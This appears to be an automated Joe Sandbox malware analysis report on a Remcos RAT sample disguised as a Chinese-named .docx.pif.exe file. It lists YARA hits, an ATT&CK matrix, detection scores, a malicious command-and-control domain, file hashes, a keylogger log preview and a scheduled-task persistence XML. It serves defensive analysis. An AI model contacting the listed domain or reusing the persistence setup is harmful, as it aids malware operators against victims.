Source: Yara match	File source: Process Memory Space: TkdxROLUOVpK.exe PID: 2892, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 5456, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\gaban\logs.dat, type: DROPPED

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Code function: cmd.exe

15_2_0040569A

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	11 Archive Collected Data	11 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Command and Scripting Interpreter	1 Windows Service	1 Bypass User Account Control	1 Deobfuscate/Decode Files or Information	211 Input Capture	1 Account Discovery	Remote Desktop Protocol	211 Input Capture	2 Encrypted Channel	Exfiltration Over Bluetooth	1 Defacement
Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	1 Access Token Manipulation	14 Obfuscated Files or Information	2 Credentials In Files	1 System Service Discovery	SMB/Windows Admin Shares	3 Clipboard Data	1 Remote Access Software	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	2 Service Execution	Login Hook	1 Windows Service	12 Software Packing	NTDS	3 File and Directory Discovery	Distributed Component Object Model	Input Capture	1 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	322 Process Injection	1 DLL Side-Loading	LSA Secrets	33 System Information Discovery	SSH	Keylogging	11 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	1 Scheduled Task/Job	1 Bypass User Account Control	Cached Domain Credentials	121 Security Software Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Masquerading	DCSync	131 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	131 Virtualization/Sandbox Evasion	Proc Filesystem	3 Process Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Access Token Manipulation	/etc/passwd and /etc/shadow	1 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	322 Process Injection	Network Sniffing	1 System Owner/User Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	66%	ReversingLabs	ByteCode-MSIL.Backdoor.Remcos
#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	60%	Virustotal		Browse
#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	66%	ReversingLabs	ByteCode-MSIL.Backdoor.Remcos
C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	60%	Virustotal		Browse

Source	Detection	Scanner	Label
http://geoplugin.net/json.gp	0%	URL Reputation	safe
http://geoplugin.net/json.gp	0%	URL Reputation	safe
http://geoplugin.net/json.gp/C	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
www.vipguyclassproject2024.space	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.vipguyclassproject2024.space	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
www.vipguyclassproject2024.space	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://geoplugin.net/json.gp	vbc.exe	false	URL Reputation: safe URL Reputation: safe	unknown
http://geoplugin.net/json.gp/C	#U8f6e#U6905-#U89c4#U683c.docx.pif.exe, 00000000.00000002.2092193357.00000000037A6000.00000004.00000800.00020000.00000000.sdmp, TkdxROLUOVpK.exe, 0000000A.00000002.2131352258.0000000003AC6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	#U8f6e#U6905-#U89c4#U683c.docx.pif.exe, 00000000.00000002.2091740507.00000000028D1000.00000004.00000800.00020000.00000000.sdmp, TkdxROLUOVpK.exe, 0000000A.00000002.2127357772.0000000002A61000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

⊘No contacted IP infos

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1466661
Start date and time:	2024-07-03 08:55:30 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 28s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	19
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	#U8f6e#U6905-#U89c4#U683c.docx.pif.exe renamed because original name is a hash value
Original Sample Name:	-.docx.pif.exe
Detection:	MAL
Classification:	mal100.rans.troj.spyw.expl.evad.winEXE@21/16@51/0
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 99% Number of executed functions: 240 Number of non-executed functions: 232
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target vbc.exe, PID 4304 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
02:56:21	API Interceptor	1x Sleep call for process: #U8f6e#U6905-#U89c4#U683c.docx.pif.exe modified
02:56:23	API Interceptor	28x Sleep call for process: powershell.exe modified
02:56:26	API Interceptor	1x Sleep call for process: TkdxROLUOVpK.exe modified
02:56:55	API Interceptor	2979931x Sleep call for process: vbc.exe modified
08:56:23	Task Scheduler	Run new task: TkdxROLUOVpK path: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:	data
Category:	dropped
Size (bytes):	144
Entropy (8bit):	3.3708727686148316
Encrypted:	false
SSDEEP:	3:rhlKlVElPQlx2wlDl5JWRal2Jl+7R0DAlBG45klovDl6v:6lVMol/b5YcIeeDAlOWAv
MD5:	6C70860F5DB38DF502EF1D0AA62559A6
SHA1:	ABA23D81D8BF936AC89B703CD6B1F25625C2FCCD
SHA-256:	F04E7F59874D0A74B81EC11D6DDBACFF06AA7383AB80110AF57E3E219FDFE17A
SHA-512:	C816FC465C0D4433126A37BEC16AF8E0860C4626AED0BCD86A2818AA7A3200A973541F0E9BB9052B9C20EEB1F30571614FDFA200EB1157F87FB0F52B5CDC94A2
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\gaban\logs.dat, Author: Joe Security
Preview:	....[.2.0.2.4./.0.7./.0.3. .0.2.:.5.6.:.2.3. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.log

Download File

Process:	C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\TkdxROLUOVpK.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	2232
Entropy (8bit):	5.379401388151058
Encrypted:	false
SSDEEP:	48:fWSU4y4RYdmloUeW+gZ9tK8NPZHUxL7u1iMugeC/ZPUyus:fLHyIYMqLgZ2KRHWLOug8s
MD5:	CAA584A0F6458559FD313866A206386D
SHA1:	F334EEFC6EB6210523FF581A3E2C776E4CA36ECC
SHA-256:	850A137C3C31262C2BCDE7248ECB9FD02AC0C5DE6EB18D0ACCEA871F7709002D
SHA-512:	8B08AAE77F6A543F43B066628364A57C107B6D81725A1D0B85078B2F5C3CD4E0929528178A4322C02669FE3397B692326F6598E3A18D59577A96EE5C967668A8
Malicious:	false
Preview:	@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<...............i..VdqF...\|...........System.Configuration<................t.,.lG....M...........System.Management...4.................%...K... ...........System.Xml..@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0mssylnt.hbg.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dqvqa4yx.pzb.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hrevebsh.2ac.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_npb0topg.j2r.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qcvhbsta.zuj.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qpdrikhh.rot.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vhtd5wmh.zch.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yygnsrze.4xq.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\tmpBE91.tmp

Download File

Process:	C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1585
Entropy (8bit):	5.111138330597854
Encrypted:	false
SSDEEP:	24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtJVxvn:cgergYrFdOFzOzN33ODOiDdKrsuTNv
MD5:	CD4C848977FDC9A63F12CBAADCE502CE
SHA1:	B3F73B7790638E59E1FAA58FE98ABE5C2CF20CFE
SHA-256:	71309762BD0BA5A91AC3919C010C5846741BA249FC3ADE2A0463DDEB8DCA9972
SHA-512:	E8AB87D419864C76DD8A15ED6997200DE661BEBF64ADBE195B0427D8A54E26A0A39E3647990997A605CF301D1191949EDF6CB5EF7A803A25BF4B7170612DDF79
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

C:\Users\user\AppData\Local\Temp\tmpCDF3.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1585
Entropy (8bit):	5.111138330597854
Encrypted:	false
SSDEEP:	24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtJVxvn:cgergYrFdOFzOzN33ODOiDdKrsuTNv
MD5:	CD4C848977FDC9A63F12CBAADCE502CE
SHA1:	B3F73B7790638E59E1FAA58FE98ABE5C2CF20CFE
SHA-256:	71309762BD0BA5A91AC3919C010C5846741BA249FC3ADE2A0463DDEB8DCA9972
SHA-512:	E8AB87D419864C76DD8A15ED6997200DE661BEBF64ADBE195B0427D8A54E26A0A39E3647990997A605CF301D1191949EDF6CB5EF7A803A25BF4B7170612DDF79
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe

Download File

Process:	C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	947200
Entropy (8bit):	7.983193004234871
Encrypted:	false
SSDEEP:	24576:FH4jFT3ukLRXXj/B01PAdydgysfGFmODltkGj/kZEER:NgBRXNWwydgysXiVDgEE
MD5:	A048AFA687356F7D1B0FC9375CA13D06
SHA1:	EC3F1158191496C89CE09CCB1DC699278B2A506A
SHA-256:	F0EC07E537C7BF74ABBC66AF82E1F273FCECA81467E1D74ED69514107421DE61
SHA-512:	B8D4905142400E2401AD14C7DB11E09CF22877A3F44B8BA7040B3003EE751B45006BAA565EFFD206F228DB8B0280E913970EF3D8B567A44EE4E597EE04FAA639
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 66% Antivirus: Virustotal, Detection: 60%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....w.f..............0..d..........J.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...Pb... ...d.................. ..`.rsrc................h..............@..@.reloc...............p..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.983193004234871
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Win16/32 Executable Delphi generic (2074/23) 0.01% Generic Win/DOS Executable (2004/3) 0.01%
File name:	#U8f6e#U6905-#U89c4#U683c.docx.pif.exe
File size:	947'200 bytes
MD5:	a048afa687356f7d1b0fc9375ca13d06
SHA1:	ec3f1158191496c89ce09ccb1dc699278b2a506a
SHA256:	f0ec07e537c7bf74abbc66af82e1f273fceca81467e1d74ed69514107421de61
SHA512:	b8d4905142400e2401ad14c7db11e09cf22877a3f44b8ba7040b3003ee751b45006baa565effd206f228db8b0280e913970ef3d8b567a44ee4e597ee04faa639
SSDEEP:	24576:FH4jFT3ukLRXXj/B01PAdydgysfGFmODltkGj/kZEER:NgBRXNWwydgysXiVDgEE
TLSH:	F51533CDA95062B3E9DF9B3B6C4A2157A32102831E51FB6B44DD286D0BF7F919A1C3C1
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....w.f..............0..d..........J.... ........@.. ....................................@................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x4e824a
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x668377DE [Tue Jul 2 03:45:34 2024 UTC]
